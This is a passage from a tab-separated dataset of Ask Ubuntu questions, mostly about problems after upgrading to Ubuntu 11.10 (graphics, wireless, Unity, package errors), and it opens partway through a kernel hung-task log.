[ < c02f5ca5 > ] do_get_write_access+0x235/0x3f0 oct 13 22:03:43 localhost kernel : [ 185521.096800 ] [ < c025aa64 > ] ? __find_get_block+0xb4/0xe0 oct 13 22:03:43 localhost kernel : [ 185521.096803 ] [ < c0176e20 > ] ? wake_bit_function+0x0/0x60 oct 13 22:03:43 localhost kernel : [ 185521.096806 ] [ < c02f478d > ] ? start_this_handle.clone.5+0x39d/0x420 oct 13 22:03:43 localhost kernel : [ 185521.096811 ] [ < c054e1e4 > ] ? sk_reset_timer+0x14/0x20 oct 13 22:03:43 localhost kernel : [ 185521.096814 ] [ < c02f5f68 > ] jbd2_journal_get_write_access+0x28/0x40 oct 13 22:03:43 localhost kernel : [ 185521.096818 ] [ < c02de97f > ] __ext4_journal_get_write_access+0x2f/0x80 oct 13 22:03:43 localhost kernel : [ 185521.096822 ] [ < c02bbef7 > ] ext4_reserve_inode_write+0x67/0x80 oct 13 22:03:43 localhost kernel : [ 185521.096825 ] [ < c02bbf4c > ] ext4_mark_inode_dirty+0x3c/0x1c0 oct 13 22:03:43 localhost kernel : [ 185521.096829 ] [ < c02d3423 > ] ? ext4_journal_start_sb+0x93/0x110 oct 13 22:03:43 localhost kernel : [ 185521.096832 ] [ < c02c0b51 > ] ? ext4_dirty_inode+0x31/0x50 oct 13 22:03:43 localhost kernel : [ 185521.096836 ] [ < c02c0b51 > ] ext4_dirty_inode+0x31/0x50 oct 13 22:03:43 localhost kernel : [ 185521.096839 ] [ < c0253ed9 > ] __mark_inode_dirty+0x29/0x1d0 oct 13 22:03:43 localhost kernel : [ 185521.096842 ] [ < c025b4ec > ] ? __set_page_dirty+0x6c/0xc0 oct 13 22:03:43 localhost kernel : [ 185521.096845 ] [ < c0249741 > ] file_update_time+0xc1/0x140 oct 13 22:03:43 localhost kernel : [ 185521.096848 ] [ < c0208d1f > ] do_wp_page+0x12f/0x820 oct 13 22:03:43 localhost kernel : [ 185521.096851 ] [ < c020b276 > ] handle_pte_fault+0x296/0x2f0 oct 13 22:03:43 localhost kernel : [ 185521.096855 ] [ < c0105a64 > ] ? pte_mfn_to_pfn+0xa4/0xc0 oct 13 22:03:43 localhost kernel : [ 185521.096858 ] [ < c020bf39 > ] handle_mm_fault+0x109/0x1b0 oct 13 22:03:43 localhost kernel : [ 185521.096861 ] [ < c063aad0 > ] ? do_page_fault+0x0/0x490 oct 13 22:03:43 localhost kernel : [ 185521.096864 ] [ < c063ac2e > ] do_page_fault+0x15e/0x490 oct 13 22:03:43 localhost kernel : [ 185521.096868 ] [ < c01078b8 > ] ? xen_clocksource_get_cycles+0x8/0x10 oct 13 22:03:43 localhost kernel : [ 185521.096871 ] [ < c01818b0 > ] ? getnstimeofday+0x50/0x130 oct 13 22:03:43 localhost kernel : [ 185521.096875 ] [ < c0387d32 > ] ? copy_to_user+0x42/0x60 oct 13 22:03:43 localhost kernel : [ 185521.096879 ] [ < c015e372 > ] ? sys_gettimeofday+0x32/0x70 oct 13 22:03:43 localhost kernel : [ 185521.096882 ] [ < c063aad0 > ] ? do_page_fault+0x0/0x490 oct 13 22:03:43 localhost kernel : [ 185521.096885 ] [ < c0637e3f > ] error_code+0x67/0x6c oct 13 22:05:43 localhost kernel : [ 185641.096048 ] info : task jbd2/xvda1-8:136 blocked for more than 120 seconds . oct 13 22:05:43 localhost kernel : [ 185641.096067 ] `` echo 0 > /proc/sys/kernel/hung_task_timeout_secs '' disables this message . oct 13 22:05:43 localhost kernel : [ 185641.096077 ] jbd2/xvda1-8 d eb35fe18 0 136 2 0x00000000 oct 13 22:05:43 localhost kernel : [ 185641.096083 ] eb35fe60 00000246 eb1b09b8 eb35fe18 c0135b80 44bcee4c eb3141ac c097f680 oct 13 22:05:43 localhost kernel : [ 185641.096089 ] 3b71d7cd 0000a892 eb3141a8 c097f680 c097f680 ec696680 eb313f20 e9a40000 oct 13 22:05:43 localhost kernel : [ 185641.096095 ] c08c6f80 0187099e eb35fe20 c01077d9 eb35fe28 eb1b09b8 eb35fe58 c0181af8 oct 13 22:05:43 localhost kernel : [ 185641.096102 ] call trace : oct 13 22:05:43 localhost kernel : [ 185641.096112 ] [ < c0135b80 > ] ? pvclock_clocksource_read+0xa0/0x110 oct 13 22:05:43 localhost kernel : [ 185641.096117 ] [ < c01077d9 > ] ? xen_clocksource_read+0x19/0x20 oct 13 22:05:43 localhost kernel : [ 185641.096122 ] [ < c0181af8 > ] ? ktime_get_ts+0xf8/0x120 oct 13 22:05:43 localhost kernel : [ 185641.096128 ] [ < c06355af > ] io_schedule+0x5f/0xa0 oct 13 22:05:43 localhost kernel : [ 185641.096133 ] [ < c0259c58 > ] sync_buffer+0x38/0x40 oct 13 22:05:43 localhost kernel : [ 185641.096136 ] [ < c0635dad > ] __wait_on_bit+0x4d/0x70 oct 13 22:05:43 localhost kernel : [ 185641.096140 ] [ < c0259c20 > ] ? sync_buffer+0x0/0x40 oct 13 22:05:43 localhost kernel : [ 185641.096143 ] [ < c0259c20 > ] ? sync_buffer+0x0/0x40 oct 13 22:05:43 localhost kernel : [ 185641.096146 ] [ < c0635e31 > ] out_of_line_wait_on_bit+0x61/0x70 oct 13 22:05:43 localhost kernel : [ 185641.096151 ] [ < c0176e20 > ] ? wake_bit_function+0x0/0x60 oct 13 22:05:43 localhost kernel : [ 185641.096154 ] [ < c0259c1e > ] __wait_on_buffer+0x2e/0x30 oct 13 22:05:43 localhost kernel : [ 185641.096159 ] [ < c02f6d6b > ] jbd2_journal_commit_transaction+0x4cb/0xf30 oct 13 22:05:43 localhost kernel : [ 185641.096163 ] [ < c06373d9 > ] ? _raw_spin_unlock_irqrestore+0x19/0x20 oct 13 22:05:43 localhost kernel : [ 185641.096167 ] [ < c0167637 > ] ? try_to_del_timer_sync+0x67/0xb0 oct 13 22:05:43 localhost kernel : [ 185641.096171 ] [ < c02fb2fe > ] kjournald2+0x8e/0x1c0 oct 13 22:05:43 localhost kernel : [ 185641.096174 ] [ < c0176dd0 > ] ? autoremove_wake_function+0x0/0x50 oct 13 22:05:43 localhost kernel : [ 185641.096177 ] [ < c02fb270 > ] ? kjournald2+0x0/0x1c0 oct 13 22:05:43 localhost kernel : [ 185641.096180 ] [ < c0176864 > ] kthread+0x74/0x80 oct 13 22:05:43 localhost kernel : [ 185641.096183 ] [ < c01767f0 > ] ? kthread+0x0/0x80 oct 13 22:05:43 localhost kernel : [ 185641.096187 ] [ < c010b0fe > ] kernel_thread_helper+0x6/0x10 oct 13 22:05:43 localhost kernel : [ 185641.096194 ] info : task java:11610 blocked for more than 120 seconds . < a few more logs cut due to size limits >
65883	is it now possible to use a blacklisted nvidia 7200 card in unity ?	i heard that the nvidia 7200 gs card has been blacklisted since natty . also , i read that you can add unity_force_start=1 to /etc/environment to use unity 3d . that does n't seem to work for me though . i can play 3d required games such as neverball and nexuiz , but i also want to be able to use unity 3d , because the 2d version is pretty unusable , at least for me . is there any workaround to get unity working for me ? inb4 get a new graphic card . ps : current driver i am using : 280.13
65884	wireless woes . ca n't seem to get b43-fwcutter and firmware-b43-installer to stay put upon reboot	i 'm running 11.10 on a dell inspiron n4010 ( 14r ) and ca n't get my wireless settings to stick after a reboot . as the title states , the first thing i do when using a fresh install is to get synaptic running and install b43-fwcutter and firmware-b43-installer . so , upon rebooting , i am forced to use the wired connection which , strangely , will then detect my wireless network , and i can unplug the cable and use wireless until the next reboot . btw- wireless works fine when booting from a live-usb . the following is the output from sudo lshw -c network : description : wireless interface product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 01 serial : 1c:65:9d:99:10:2c width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=brcmsmac driverversion=3.0.0-12-generic firmware=n/a ip=192.168.1.2 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : f0500000-f0503fff thanks in advance for any advice you all might have !
65886	how do i remove the nautilus top bar on a second screen ?	is there any way to remove it without losing icons on the desktop ?
65889	computer shuts down when unplugged	i have an msi wind u100 netbook ( they call it a notebook ) . every time i unplug the ac adapter the machine shuts down as if the battery is dead . i get a notification that says `` battery is critical and is about to shut down '' or something to that sense . it did this before but i fixed it by doing current workaround is to open gconf-editor and browse to : /apps/gnome-power-manager/general and de-select the option use_time_for_policy but that does n't work with 11.10 . i have also searched and ca n't find a solution . anyone ?
65890	does startup-manager work in 11.10 ?	does startup-manager work with ubuntu 11.10 64bit ?
65891	how do i run a command automatically upon boot ?	currently my ubuntu setup is going directly to console . i have lxde installed , and have to enter `` startlxde '' every time i restart the computer . is there a way to automatically run this command at startup ?
65898	how to change nvidia x server settings ?	in ubuntu 11.04 , graphics settings for the driver could be found under `` system settings '' . in ubuntu 11.10 , the `` system settings '' menu has been scaled down considerably . now i do not know how to access these settings . thanks
65900	how can i change default settings for new users ?	every key in the dconf database has a default value that is used when user accounts are created . how can i change these default values ?
65902	compiz animations jittery with an ati radeon hd 6520g	i have ubuntu 11.10 64bit installed on a machine with an amd a6-3400m cpu , and a radeon hd 6520g card . for some reason all compiz animations are very jittery and unpleasant to look at . i have the ati fglrx driver installed but when i try to install the version with post-release updates from jockey it says installation failed . i have tried downloading compiz config , and setting the refresh rate to 60hz ( from 50hz , i read online that this helps ) but it always changes back to 50 , even after i check off not to detect the refresh rate . if need be , i can post the jockey log . perhaps the issue is with 64 bit ubuntu , but if i install 32 bit , will it be able to address all 6gb of my ram ? i know windows 32 bit ca n't . thanks in advance .
65903	display not detected on a thinkpad t420	i just upgraded from 11.04 to 11.10 everything is working except display is listed as `` unknown '' with max resolution of 1024x786 . does not give option to go higher . laptop is a late model t420 with intel graphics . how can i get this up to native resolution ?
65904	how do i fix a corrupted mouse cursor ?	i have the same problem as here : mouse pointer strange problem . the mouse cursor is corrupted after a reboot , happens quite often . i understand that i have to disable the hardware cursor and enable the software cursor , but how to do this ? reconfigure x ? one way may be to reconfigure the x server , but i do n't currently have /etc/xorg.conf in order to get that file , i probably have to run x -configure ? i can not have x server running when doing that ? how to stop the x server ? i ca n't reboot into rescue mode . i 'm running ubuntu on a usb stick ( universal usb installer ) , and it says `` can not find kernel image : rescue '' . there were some instructions how to get the rescue mode working ( syslinux.cfg related ) but those failed to work . any other ideas how to stop the x server and configure the x to get me a xorg.conf file ? xorg.d conf files ? this sounds like a good bet : where is the x.org config file ? how do i configure x there ? i 'm still having trouble to figure out what to put into a file that would define the proper device .
65906	graphics does n't work on a vostro 1500	i could boot the live usb without problem . using it , i installed 11.10 into an usb disk . did the same with previous versions ( 10.04 and 10.10 ) without problems before . now , when i boot this fresh installation , it shows like a terminal , and the last message is something like `` checking battery state '' . i can switch to another terminal ( tty1 ) and log in ... already installed nvida-current , gdm , etc ... without luck ... really , i 'm very disappointed with 11.10 ... its the first version from 9.10 that does n't work out the box with my vostro 1500 ( nvidia 8600gt movile ) ... any idea ? ? ?
65907	what is eating the super+space shortcut ?	i used to have gnome-do bound to super+space but this stopped working after upgrading to oneiric . i assume this has something to do with the new gnome/compiz combination . i 've looked through both gnome 's and compiz 's shortcuts but ca n't see anything that would be nixing the keypress . i 've temporarily assigned it to super+v and this works . any ideas or do i file this as a bug against gnome-do ?
65908	netflix on ubuntu + xbox360	i will start and write i read is there a way to stream netflix ? it is written in the comments that there is a way to do it if you have xbox + computer with ubuntu . i would have done this through the xbox directly , i just do not have xbox live account , and do not wish to buy one just for netflix . so , how do i use my ubuntu + xbox 360 to stream netflix to my tv ?
65910	what are the standard desktop colors ?	what are the standard notification colors in 11.10 ? i 'm writing an app with an appindicator , and i 'd like it to match the desktop color scheme . is there anywhere this stuff is documented ? i checked developer.ubuntu.com , but without any luck .
65911	how can i fix a 404 error when updating packages ?	ppa seems to be constantly offline . whenever i use sudo apt-get update , this error is shown : w : failed to fetch http : //ppa.launchpad.net/ 404 not found how do i fix these errors ?
65913	how to create a new dash panel for my program ?	i am developing a new ai chatbot assistant that i want to embed in the dash menu panel in unity . where do i go into the . * files to edit / create this ? also can i code menus in python at all ? basically i am wanting to give the chatbot access to find files , applications , webpage links email address ect from what is found in unity . basically like the new siri for iphone . any help would be great . the project i am working on is called butlerbot which i am hosting off github . thanks
65918	how do i remove files from my ubuntu one folder	i need some help on removing some files from my ubuntu one account and i have no clue where to start .
65919	libglib2.0 errors on 11.10 upgrade and installing ia32-libs	ran through the upgrade to 11.10 and bunch of errors came back . after some initial diagnosis and autoremove via apt-get , i 've still got 17 packages that wo n't install . running dpkg -- audit gives me : the following packages are only half configured , probably due to problems configuring them the first time . the configuration should be retried using dpkg -- configure < package > or the configure menu option in dselect : libglib2.0-0 : i386 glib library of c routines so i run that , and get the following : sudo dpkg -- configure libglib2.0-0 : i386 setting up libglib2.0-0 : i386 ( 2.30.0-0ubuntu4 ) ... /usr/lib/i386-linux-gnu/glib-2.0/glib-compile-schemas : error while loading shared libraries : libglib-2.0.so.0 : can not open shared object file : no such file or directory /usr/lib/i386-linux-gnu/glib-2.0/gio-querymodules : error while loading shared libraries : libglib-2.0.so.0 : can not open shared object file : no such file or directory dpkg : error processing libglib2.0-0 : i386 ( -- configure ) : subprocess installed post-installation script returned error exit status 127 processing triggers for libc-bin ... ldconfig deferred processing now taking place errors were encountered while processing : libglib2.0-0 : i386 any ideas ? update : so , i was able to clear some errors , but now i can reproduce this when trying to install ia32-libs . update2 : ldd /usr/lib/i386-linux-gnu/glib-2.0/glib-compile-schemas linux-gate.so.1 = > ( 0xf779d000 ) libglib-2.0.so.0 = > not found libc.so.6 = > /opt/mcafee/runtime/2.0/lib/libc.so.6 ( 0xf767b000 ) /lib/ld-linux.so.2 ( 0xf779e000 ) ldd /usr/lib/i386-linux-gnu/glib-2.0/gio-querymodules linux-gate.so.1 = > ( 0xf76f2000 ) libglib-2.0.so.0 = > not found libgobject-2.0.so.0 = > not found libgmodule-2.0.so.0 = > not found libgio-2.0.so.0 = > not found libc.so.6 = > /opt/mcafee/runtime/2.0/lib/libc.so.6 ( 0xf75cf000 ) /lib/ld-linux.so.2 ( 0xf76f3000 ) grep -r . /etc/ld.so.conf* : /etc/ld.so.conf : include /etc/ld.so.conf.d/*.conf /etc/ld.so.conf.d/biarch-compat.conf : # legacy biarch compatibility support /etc/ld.so.conf.d/biarch-compat.conf : /lib32 /etc/ld.so.conf.d/biarch-compat.conf : /usr/lib32 /etc/ld.so.conf.d/x86_64-linux-gnu_gl.conf : /usr/lib/nvidia-current-updates /etc/ld.so.conf.d/x86_64-linux-gnu_gl.conf : /usr/lib32/nvidia-current-updates /etc/ld.so.conf.d/i686-linux-gnu.conf : # multiarch support /etc/ld.so.conf.d/i686-linux-gnu.conf : /lib/i386-linux-gnu /etc/ld.so.conf.d/i686-linux-gnu.conf : /usr/lib/i386-linux-gnu /etc/ld.so.conf.d/i686-linux-gnu.conf : /lib/i686-linux-gnu /etc/ld.so.conf.d/i686-linux-gnu.conf : /usr/lib/i686-linux-gnu /etc/ld.so.conf.d/nvidia_settings.conf : /usr/lib/nvidia-settings-updates /etc/ld.so.conf.d/libc.conf : # libc default configuration /etc/ld.so.conf.d/libc.conf : /usr/local/lib /etc/ld.so.conf.d/x86_64-linux-gnu.conf : # multiarch support /etc/ld.so.conf.d/x86_64-linux-gnu.conf : /lib/x86_64-linux-gnu /etc/ld.so.conf.d/x86_64-linux-gnu.conf : /usr/lib/x86_64-linux-gnu these files exist : /lib32/libglib-2.0.so.0 - > libglib-2.0.so.0.3000.0 /lib/i386-linux-gnu/libglib-2.0.so.0 - > libglib-2.0.so.0.3000.0 /usr/lib32/libgobject-2.0.so.0 - > libgobject-2.0.so.0.3000.0 /usr/lib/i386-linux-gnu/libgobject-2.0.so.0 - > libgobject-2.0.so.0.3000.0 more info : echo $ ld_library_path , $ ld_preload , $ path : , , /home/vrigdon/bin : /home/vrigdon/apache-maven-3.0.3/bin : /home/vrigdon/apache-ant-1.8.2/bin : /home/vrigdon/bin : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /home/vrigdon/dev/lib/android-sdk-linux_x86/platform-tools : /home/vrigdon/gradle-1.0-milestone-3/bin
65920	creating showcase iso / live cd	so , i 'm trying to create a showcase iso for a specific project , so it can be demonstrated easily anywhere . ubuntu is not a requirement , but the distro i 'm familiar with ( kind of ) . what i need is : java runtime environment 6.0 , postgres 8.4 with custom database installed , jboss application server 4.2.1 with already deployed application and firefox with handy bookmarks . language pack for local language is desirable . there is a livecdcustomization on ubuntu help section , but i 'm a novice linux user , that 's too complicated for me right now . my guess of the easiest way possible would be to set an ubuntu installation just like i need it inside virtualbox ( already done ) and somehow turn it into a livecd . googling around i found remastersys , but i could n't get it right , the forums were quite slow , and the few help i got did n't fix my issues . plus , it was recently discontinued . of the different problems i found , the most tricky is postgres . it requires a special user that is the owner of the data folder , and such user is lost when creating an iso with remastersys , making the database unusable . jboss requires virtually no config at all . right now i 'd like to know of any other tool or novice-friendly method to produce this live cd . thanks !
65922	how can i install the equinox theme ?	i 'm following the instructions on this page : sudo add-apt-repository ppa : tiheum/equinox sudo apt-get update sudo apt-get install gtk2-engines-equinox equinox-theme but i 'm getting : e : unable to locate package equinox-theme
65924	`` the upgrade has aborted '' error , how to proceed ?	i decided to update to oneiric using the update manager . at some point , i got this message : the upgrade has aborted . your system could be in an unusable state . a recovery will run now ( dpkg -- configure -a ) . then , later on : the upgrade has completed but there were errors during the upgrade process . what can i do ? edit : update manager offers to perform a 'partial upgrade ' . `` 865 updates have been selected . the updates have already been downloaded , but not installed '' . it still gives the option to upgrade to 11.10
65925	brightness setting not saved in ubuntu 11.10	i have to reconfigure the brightness every time after reboot . is there anyway to make it remember the settings , or other workaround if possiable ?
65928	adding a virtual screen to xorg.conf 11.04 ( third display over vnc )	i currently have an nvidia gtx470 with 2 x 22 '' 1920x1080 displays on twinview . since i have a spare laptop ( old but works ) and screen ( 22 '' 1680x1050 ) . a vnc server would be set up ( viewonly ) to the virtual screen and the laptop would login ( viewonly ) so its just a screen ... the virtual screen would be part of my gnome session ... and in theory make me a triple display setup , i 've seen it done in windows ... what is holding us ? since i 'm not all to experienced with vnc or xorg.conf ( only just learning the settings , can someone give me directions how to make a virtual screen/monitor and what vnc server allows for connecting to a certain screen . ( realvnc does this in windows ... ) i hope one of you can help grtz , dutchy edit : my current work around is to just use unity and vnc into vmware workstation machines ... alltough this kinda gets done some of the stuff i need , i would still like to have an actual third monitor
65929	need a decent wallpaper changer for ubuntu 11.10	what is a good reliable wallpaper manager/switcher/changer/etc for ubuntu 11.10 ? i used to use desktopnova in 11.04 but it does n't seem to work anymore . i have all the required packages installed for desktopnova . wally does n't seem to work anymore either , and i do n't really like wallch . are there any other options at this time ?
65931	users and groups icon not showing	i 'm trying to setup virtualbox in my ubuntu 11.10 install but i ca n't find the icon for users and groups to change the settings and modify usb access for my virtual machine ... . any help ?
65936	can i install the enlightenment shell alongside unity and gnome3 and choose upon login ?	does anybody know if it is possible to install enlightenment in ubuntu ( 11.10 ) and be able to choose unity gnome or enlightenment from the login screen ? is this at all possible ?
65940	desktop effects could not be enabled with intel core i7 2600k	i have installed ubuntu 10.10 ( 32 bit ) on a 'budget ' sandybridge pc . the moterhboard is asrock h67m . no extra graphic card . when i try to use 'normal ' or 'extra ' visual effect i get this message : desktop effects could not be enabled here is the lspci result : 00:00.0 host bridge : intel corporation sandy bridge dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation sandy bridge integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation cougar point heci controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation cougar point usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation cougar point high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation cougar point pci express root port 1 ( rev b5 ) 00:1c.2 pci bridge : intel corporation cougar point pci express root port 3 ( rev b5 ) 00:1c.3 pci bridge : intel corporation 82801 pci bridge ( rev b5 ) 00:1c.4 pci bridge : intel corporation cougar point pci express root port 5 ( rev b5 ) 00:1d.0 usb controller : intel corporation cougar point usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation cougar point lpc controller ( rev 05 ) 00:1f.2 ide interface : intel corporation cougar point 4 port sata ide controller ( rev 05 ) 00:1f.3 smbus : intel corporation cougar point smbus controller ( rev 05 ) 00:1f.5 ide interface : intel corporation cougar point 2 port sata ide controller ( rev 05 ) 02:00.0 usb controller : device 1b6f:7023 ( rev 01 ) 03:00.0 pci bridge : device 1b21:1080 ( rev 01 ) 05:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 problems that i have which may be relevant : sometimes the display starts to flicker for a few minutes in random intervals and then comes back to normal . usually i see some random red pixels appear on the black sides of the monitor . i could not update the mb 's bios . in general the graphic performance is less than what i had with intel core due on a dell optiplex 755 . i appreciate your suggestions .
65942	how do you change the theme , icon-set and mouse-theme	i love the idea for ubuntu 11.10 , but i ca n't customize it the way i want it . also , how do you change the theme , icon-set and mouse-theme on ubuntu 11.10 ? note : i wo n't change oses , install gnome shell or go to an older version because i want the most secure updates , and for other various reasons .
65944	display too dark on an acer emachines e725	i just did a wubi install of ubuntu 11.10 ony my acer emachines e725 . after i reboot , the display is too dark that i can only see the white backgrounds and my mouse ( when it is in the middle of the screen where the wallpaper is a little brighter ) . before i did a wubi install i also tried live using usb . does anyone know how to deal with this . should i go ahead and do a full install ?
65951	how to disable the touchpad ?	i want my touchpad to be disabled when i use my mouse . how can i do that ? touchpad-indicator has stopped working on 11.10 . it used to work on 11.04 . gnome3 is not a solution as i do n't like it and find it buggy .
65952	second monitor stopped working	after setting up 11.10 today , i seem to be having problems with my dual monitor set up . it worked without issues in mint but today after i switched to 11.10 only one monitor seems to function . this seems a little odd to me . during setup both monitors functioned without issue , although they were mirroring each other both monitors but as soon as it booted into unity my secondary monitor stopped working . i checked under settings- > display and the second monitor does n't seem to even be detected . on the off chance it had something to do with drivers , i upgraded the proprietary drivers to the latest version with zero success . if anyone has any ideas , i 'd love to hear them .
65954	how to rearrange items in the unity 2d panel ?	for performance reasons , i am currently using unity 2d . i started google chrome and right-clicked the icon in the unity panel and clicked `` keep in launcher '' . however , i am not happy with the location in the panel that the icon ended up . i would like to move it around and re-arrange some other items as well . i have tried dragging-and-dropping icons , but that does n't seem to work .
65957	how do i enable automatic login in mythbuntu 11.10	i just upgraded to mythbuntu 11.10 , and everything is working great , except for one snag . automatic login has gone away . when i try to call up the interface for setting it , the option to make the setting is grayed out , as shown in the picture below . i have tried running the mythbuntu-control-centre as a regular user , and as root , and either way , i ca n't access the settings . how do i get my autologin function back ?
65958	how do i link the ubuntu one logo from my blog ?	is there any code to link the ubuntu one logo from my blog so that i can access it from there whenever i want and also to promote ubuntu one ?
65959	no visible screen after updating to 11.10 , system boots to tty1	i have just upgraded via the update manager from 11.04 to 11.10 and have a problem in that after rebooting i have no visible screen , just an extremely thin line along the top of my monitor . as i am running on amd64 with an nvidia card i tried the solution outlined here as regards renaming my xorg.conf file via a 11.04 live cd , but this has not worked . according to grub my new updated kernel is 3.0.0-11 ( development branch ) and i must say that i was unpleasantly surprised that a distribution upgrade via the update manager on release day would upgrade me to a development release . can anyone offer any advice as to how i can solve this problem ? edit - update on problem after perusing many forum entries , entry # 27 for 64-bit here actually worked . after `` sudo reboot now '' i got into the gui and everything seemed ok. then went to update manager and found i had 700mb plus of updates to still install . started installing them , and while update manager was running in the background i attempted to open firefox . the screen immediately went to a multi-coloured `` sandstorm '' and everything froze - neither the mouse or keyboard had any effect . all i could do was reboot by pressing the reset button , and since that the system only boots into tty1 . what now ?
65960	gnome shell freezes when searching	i have my laptop running 11.10 and using gnome-shell for my sessions , however whenever i try to `` search '' for an application or file in the new gnome panel everything freezes and my cpu goes full load and i ca n't do anything . is this just a bug or is it hardware related to some certain cpus ?
65961	is there a quick easy way to access the command line for unity launchers ?	i 'd like to be able to access the command that is executed by launchers in unity in a quick and easy way - something like a right-click entry . there are answers that are a bit more involved here and here . i 'd like to be able to access the command line faster and without having to remember how ( beyond , say , right clicking ) .
65963	how do i remove the launcher ?	what i want , is the top bar from unity and nothing else . everything i 've tried so far has failed . i 've installed compiz , but there does n't seem to be any options to permanently hide the launcher ( the bar on the left ) from the screen entirely . is there a way to remove it ?
65965	what is the command to open the shutdown dialog ?	i would like to use a gesture to shutdown/restart my computer and i need to know the command that launches the shutdown dialog :
65969	display brightness goes two shades darker if i am idle for 10-11 seconds	the display brightness comes down 2 shades darker if i 'm idle for 10-11secs ! ! it automatically dims itself : o and it 's very distracting ! earlier this could be avoided through power management , by the `` dim display brightness while idle '' setting and setting the time limit . now , apparently , it 's not available there ? is there a way out ?
65971	what is the `` show desktop '' keyboard shortcut ?	i just upgraded to 11.10 from 11.04 . previously the shortcut to show the desktop was super key + d ( same as in windows ) , but now it is not working . what is the new shortcut ?
65972	what are the `` standard gtk+ toolkit command line options '' ?	i have a problem with the 'synaptic ' application ( gui version of apt ) , and was hoping to get some debug output from it . the man page however has just a couple of command line options and this very helpful statement : '' synaptic accepts all of the standard gtk+ toolkit command line options as well as the following : '' unfortunately , there 's no indication of how i might determine what those are , and my googlefu has so far been unhelpful..
65973	ubuntu wo n't boot after upgrade to 11.10	i have just upgraded one of my computers from 11.04 to 11.10 using the upgrade tool in the update manager interface . everything seemed to go smoothly , until the very end when the reboot happened . at that point , it would not reboot . when i reboot , one of three things happens . it hangs at a blank purple screen , it hangs at the screen with the ubuntu logo and five orange dots underneath , or , if i try to boot into recovery mode , it blurts out some text . here is what those screens look like : here is a close up of the text from the screen i get when going into recovery mode . it is always the same . the black text over top the option interface seems to prevent me interacting with it , so this is how it stays unless i reboot : i ca n't seem to initiate any way of getting to a prompt . [ ctrl ] + [ f6 ] or [ ctrl ] + [ backspace ] do n't work . i tried pressing [ f6 ] immediately after grub finished , which i thought i read on the net somewhere would help ... anyway , i do n't know how to initiate any kind of interface so i can even figure out what the problem is . the usual suspects are the nvidia graphics card , or maybe something to do with my software raid ( 2 500gb drives ) . however , i have no idea what is actually happening . how do i get my ubuntu 11.10 to boot ? ( previous versions seem to have been removed , so i ca n't go back . )
65974	why is shutdown so much slower than previous versions ?	i have made a fresh install of ubuntu 11.10 on my netbook with a ssd disk , but it takes so much longer to shut it down in comparisson with 11.04 , 10.10 or 10.04 which were ultra fast . it will take about 5 times longer , which is annoying ... is there perhaps some process waiting with a huge timeout ? how could i check this ?
65975	how do i activate scrolling on my trackpad ?	i have an acer aspire 5738 , and the trackpad allows for scrolling . it worked in natty and maverick , but does n't work on my fresh installation of oneiric stable . how do i get this to work ?
65977	is upgrading from 11.04 with gnome3 to 11.10 safe ?	i have an 11.04 machine with gnome 3.0 shell and i would like to upgrade it to 11.10 . my concern is some sort of conflict between the gnome 3 package i have installed and 11.10 during the upgrade . anyone got ideas on what might happen if i upgrade ? has anyone tried this ?
65978	how to scp a file ( s ) from ubuntu virtual machine to remote web host ?	i 'm trying to scp some files from my local ubuntu 10.04 virtual machine ( running on a windows vista platform ) up to my remote web host . ssh is enabled on their end and i was able to login via the command line so i know i 'm using the right port # . here is what i tried : i login in to the web host via ssh shell . then at the command prompt `` remoteuser @ remotehost '' i type : scp -p port # -r myuserid @ 127.0.0.1 : /~/fromfolder/ ~/public_directory/tofolder/ where port # is an actual port # like 22 i was asked for myuserid @ 127.0.0.1 's password but it would n't take the password i normally use with this localhost account . what is the best way to use scp ? do i login the remote host via ssh and then run scp at the command prompt remoteuser @ remotehost $ or should i just run scp from my localhost ?
65979	intel hd graphics in dell inspiron n4030 detected as unkown	i have a dell inspiron n4030 with an intel hd graphic card but it 's detected as `` unknown '' graphics card and it 's not working well when i use it with an external monitor samsung syncmaster 933sn i have tried ubuntu 10.10 , 11.04 with the same result any help would be appreciated
65981	how can i get gnome-panel in ubuntu 11.10 ?	i want gnome-panel in my ubuntu 11.10 to put netspeed applet in that panel .
65982	congratulations ! ! ! askubuntu.com has been included in the official ubuntu doc	askubuntu.com has been included in the official ubuntu documentation of 11.10 . during the installation , the slideshow shows askubuntu.com home page as a place for support ... .
65984	gnome-shell and removal devices	i 'm using ubuntu 10.10 with gnome-shell . in /etc/fstab i add following lines : /dev/sda4 /media/d ntfs none 0 1 when i move mouse on right bottom corner i see indicator - removable device . in this indicator i see only my real hard drive ( ntfs volume ) . can i remove this icon for hard drive , but stay work for removable devices ?
65986	how do i force a maximum of one instance of nautilus ?	since nautilus can open tabs , wo n't it be better if there was an option to force only 1 instance of it ? is it possible ?
65988	crash after update to 11.10 , from 11.04	i have searched quite a lot , but it seems that i am the only unfortunate . last night i chose to upgrade ( via internet install ) to 11.10 from my 11.04 , but after the upgrade , ubuntu just does n't boot . i was expecting some glitches , but never expected a complete crash . my only fault , i left it to upgrade over the night , unattended , and went to sleep . not knowing what might have happened . i am attaching a screenshot , which might help knowing what 's going on . . ( since i could n't use system 's internal imaging system as no os was booted , i shot it from my phone 's camera . i hope it 's clear enough to read . please let me know if you need more details . ) is there any way out ? update as per instructions , i went to tty2 , and ran sudo apt-get update which showed following errors : i then ran sudo apt-get upgrade and saw it processing many files . after a while when it quit , i restarted the system , but its still stuck at 'checking battery state' sudo apt-get update still shows these errors , but upgrade says the system is upgraded 0 files to remove , 0 to change
65989	where i can place gtk+ themes ?	copying all themes to usr/share/themes but in gnome shell tool see only system themes ; / . i want to change window background . system themes suck ... where/how ? screenshot :
65990	how do i access wine applications from unity ?	i just did a clean install of 11.10 . this is my first time using unity . i installed wine and successfully used it to install irfanview . i ca n't figure out how to launch irfanview from unity . do wine programs not show up in unity , and if not , how do i access them ?
